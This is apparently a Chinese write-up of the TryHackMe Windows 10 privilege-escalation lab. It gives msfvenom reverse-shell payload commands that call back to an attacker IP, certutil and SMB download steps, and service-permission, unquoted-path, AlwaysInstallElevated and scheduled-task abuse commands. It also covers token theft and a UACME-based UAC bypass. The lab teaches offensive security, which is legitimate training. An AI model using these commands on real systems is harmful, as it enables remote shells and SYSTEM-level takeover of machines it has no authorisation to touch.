windows10提权
创始人
2024-01-21 04:47:09
0

参照tryhackme的win10提权靶场
靶场,地址
里面共描述了服务路径,文件权限,计划任务,令牌窃取,图形化软件,应用组件安装等,这里只有令牌窃取需要管理员Administrator权限,值得注意的是该权限并不是管理员组中的其他用户
这里介绍下使用的工具以及相应链接
winPEAS:用于windows以及linux系统提权,
accesschk:用户可以使用该组件了解文件、目录、注册表项、全局对象和 Windows 服务的访问权限
impacket:是用于处理网络协议的 Python 类的集合
UACME:通过滥用内置的 Windows AutoElevate 后门来击败 Windows 用户帐户控制,简单地说 bypassuac
Certutil:windows自带工具,可以用来获取文件
sc:windows系统内置,是用于与服务控制管理器和服务进行通信的命令行程序

服务搭建
通过网站提供的vpn连接到所需环境中,远程桌面连接目标主机,实现远控前提
这里介绍两种方法
主机使用msf生成病毒文件,这里可以生成两个不同端口的exe,以便后续反弹会话

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.14.36.66  LPORT=4444 -f exe -o reverse.exe

主机使用http开启httpserver服务,靶机进行下载

python -m SimpleHTTPServer 80
certutil.exe -urlcache -split -f http://10.14.36.66/reverse.exe

主机挂载smb共享目录,靶机进行下载

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
copy \\10.14.36.66\kali\reverse.exe C:\PrivEsc\reverse.exe

还有就是msf生成powershell,目标机进行执行,但是个人测试中,命令无法复制粘贴,不进行测试
在这里插入图片描述主机监听,获取meterpreter会话
在这里插入图片描述
该靶机以安装相关工具,这里使用winPEASany.exe探测目标信息

服务权限不当
在这里插入图片描述通过这段描述,我们可以对该文件进行写入或者创建,并且该文件处于停止状态,
使用accesschk查看该文件的详细信息

accesschk.exe /accepteula -uwcqv user daclsvc

在这里插入图片描述
发现可以启动关闭该服务,以及写入读取配置文件等,使用sc qc查询daclsvc的配置信息

在这里插入图片描述
发现该文件以system权限运行,而我们拥有对该文件的修改权限,修改daclsve服务的具体执行文件,从而获取system权限

sc config daclsvc binpath= "\"C:\PrivEsc\shell.exe\""

启动daclsvc服务即可获取shell
在这里插入图片描述
服务路径未用引号包括

在这里插入图片描述Unquoted Path Service:未引用的路径服务
使用sc qc 查看该服务配置信息
使用accesschk查看目录权限
在这里插入图片描述
不加引号时,启动顺序为

C:\Program.exe
C:\Program Files\Unquoted.exe
C:\Program Files\Unquoted Path Service\Common.exe

启动unquotedsvc服务,即可接收到system权限会话
在这里插入图片描述

不安全的服务可执行文件

在这里插入图片描述此文件的权限为all,所有用户均可修改,查看配置信息

sc qc filepermsvc

发现为本地system权限
在这里插入图片描述在这里插入图片描述任何用户均可读写,将恶意文件替换正常filepermservice文件,然后启动该服务,即可获得system权限,
在这里插入图片描述在这里插入图片描述
安装软件用户提升权限,安装某些软件时候需要使用管理员或者更高级别用户权限,
需要条件为

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

这两个键值为0或者0x1才可
该靶场环境中均为0x1
在这里插入图片描述

在这里插入图片描述生成msi安装文件,使用msf的upload上传

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.13.6.64 LPORT=4444 -f msi -o reverse.msi

在这里插入图片描述安装文件,

msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

在这里插入图片描述

在这里插入图片描述
不安全的密码存储,使用winPEASany.exe发现目标存储明文账号密码

在这里插入图片描述计划任务提权

C:\DevTools\CleanUp.ps1
查看用户权限

accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

拥有读写的权限,将恶意文件写入计划任务重,即可获得system权限
在这里插入图片描述

echo C:\PrivEsc\shell.exe >> C:\DevTools\CleanUp.ps1

即可获得system权限

不安全的GUI应用程序

在这里插入图片描述当前用户权限为user
但是打开图形化界面
在这里插入图片描述在这里插入图片描述
即为管理员权限

令牌窃取
这个玩意经过研究发现,目标如果开启SeImpersonatePrivilege模拟客户端验证,即可使用土豆系列工具直接从user权限跨越到system权限,或者更低用户权限,但均需要目标开启SeImpersonatePrivilege

whoami /priv

即可查看到,这里目标是以Administartor权限测试,这里不进行验证,我都有Administartor了,我直接msf下面getsystem即可,getsystem实际上也是令牌窃取

https://github.com/itm4n/PrintSpoofer 下载地址
https://github.com/poweradminllc/PAExec

bypassuac
需要管理员组成员
uac就是让你确定是否用管理员权限运行的弹窗
下载地址开头已给出 UACME
作者并未给出具体编译,需要个人编译,个人使用的是vsstudio2019,安装的时候

在这里插入图片描述

多选择一点,要不然报错 function.c的错误,
然后直接编译即可,编译出来的文件为akagi.exe ,win10下直接跟akagi.exe 33即可
或者 akagi.exe 33 C:\shell.exe也可

相关内容

热门资讯

喜欢穿一身黑的男生性格(喜欢穿... 今天百科达人给各位分享喜欢穿一身黑的男生性格的知识,其中也会对喜欢穿一身黑衣服的男人人好相处吗进行解...
发春是什么意思(思春和发春是什... 本篇文章极速百科给大家谈谈发春是什么意思,以及思春和发春是什么意思对应的知识点,希望对各位有所帮助,...
网络用语zl是什么意思(zl是... 今天给各位分享网络用语zl是什么意思的知识,其中也会对zl是啥意思是什么网络用语进行解释,如果能碰巧...
为什么酷狗音乐自己唱的歌不能下... 本篇文章极速百科小编给大家谈谈为什么酷狗音乐自己唱的歌不能下载到本地?,以及为什么酷狗下载的歌曲不是...
华为下载未安装的文件去哪找(华... 今天百科达人给各位分享华为下载未安装的文件去哪找的知识,其中也会对华为下载未安装的文件去哪找到进行解...
怎么往应用助手里添加应用(应用... 今天百科达人给各位分享怎么往应用助手里添加应用的知识,其中也会对应用助手怎么添加微信进行解释,如果能...
家里可以做假山养金鱼吗(假山能... 今天百科达人给各位分享家里可以做假山养金鱼吗的知识,其中也会对假山能放鱼缸里吗进行解释,如果能碰巧解...
一帆风顺二龙腾飞三阳开泰祝福语... 本篇文章极速百科给大家谈谈一帆风顺二龙腾飞三阳开泰祝福语,以及一帆风顺二龙腾飞三阳开泰祝福语结婚对应...
四分五裂是什么生肖什么动物(四... 本篇文章极速百科小编给大家谈谈四分五裂是什么生肖什么动物,以及四分五裂打一生肖是什么对应的知识点,希...
美团联名卡审核成功待激活(美团... 今天百科达人给各位分享美团联名卡审核成功待激活的知识,其中也会对美团联名卡审核未通过进行解释,如果能...